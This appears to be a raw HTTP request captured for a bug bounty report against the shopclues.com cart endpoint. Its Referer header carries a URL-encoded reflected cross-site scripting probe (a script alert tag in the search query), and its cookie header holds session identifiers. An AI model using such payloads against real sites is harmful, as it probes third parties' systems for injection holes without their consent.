POST /atom/acart/getMicroCart HTTP/1.1

Host: www.shopclues.com

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0

Accept: application/json, text/javascript, */*; q=0.01

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Referer: https://www.shopclues.com/search?q=%3Cscript%3Ealert(%22OpenBugBounty%22)%3C%2Fscript%3E&sc_z=2222&z=0&count=0

Content-Type: application/x-www-form-urlencoded; charset=UTF-8

X-Requested-With: XMLHttpRequest

Content-Length: 8

Cookie: _sessId=0:jo57qcy2:pXG0i2N5DCJ6o1w8VU3zMvi5OCvFxyqs; _uuId=0:jo57qcy2:P_3CuWlh_VLXjvHD5hdDllhPZODjzrJB; zettata_threshold=0; sc_loc=2222; sc_loc_source=ISP; sc_loc_variable=2222%7Cwest%7CISP

DNT: 1

Connection: close



return=1